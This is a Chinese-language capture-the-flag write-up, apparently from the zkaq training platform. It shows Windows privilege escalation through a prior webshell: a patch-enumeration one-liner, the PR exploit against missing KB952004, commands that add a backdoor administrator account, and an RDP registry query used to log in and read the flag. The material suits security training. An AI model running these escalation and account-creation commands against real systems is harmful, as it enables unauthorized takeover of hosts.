第六章 SYSTEM！POWER

0x01. 明確目標

https://hack.zkaq.cn/battle/target?id=3eb7bec4a7e95297

嘿嘿 , 不知道你笑了沒 , 點選傳送門 , 發現點不開 , 之好點選備用傳送門了 , 嘿嘿

四層相識的感覺 , 廢話不就是上一章那webshell的站點嗎 , ok 通過webshell 提權 , 然後flag在c盤根目錄下

獲取webshell的方法 , 我就不介紹了 , 直接看第五章即可

0x02. 提權

嘗試直接讀取c:\flag.txt , 發現果然沒有許可權

在caidao開啟終端 , 檢視當前使用者許可權

發現拒絕訪問 , 也就是當前使用者的許可權 , 不能執行預設的cmd.exe , 我們可以嘗試自己上傳一個cmd.exe到可執行

目錄下 , 注意這臺靶機是32位的 , 要用32位的cmd.exe

緊接著在菜刀中設定終端為當前上傳的cmd.exe

setp D:\05\06\UploadFiles\cmd.exe

通過命令檢視可利用的exp提權漏洞

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB952004 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
 

發現沒有打KB952004這個補丁 , 可以通過PR提權 , 上傳pr

通過pr.exe執行系統命令 , 提權成功

0x03. 獲取flag

接下來做的就是新增管理員賬號 , 3389遠端連線靶機 , 檢視flag

新增管理員賬號

pr.exe "net user yjh 123456 /add"
pr.exe "net localgroup administrators yjh /add"

檢視是否開否終端服務以及對應的埠是否為3389

net start

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
 

0xd3d轉換成十進位制就是3389

使用遠端桌面連線 , 連線靶機

win + r --> 輸入 迷失天使城的首字母(mstac) --> 回車 , 輸入靶機的公網ip

59.63.200.79

哎呦一激動忘記截圖了 , 我相信各位師傅你們都會

獲取flag

zkz{F3ck_power_sysstem}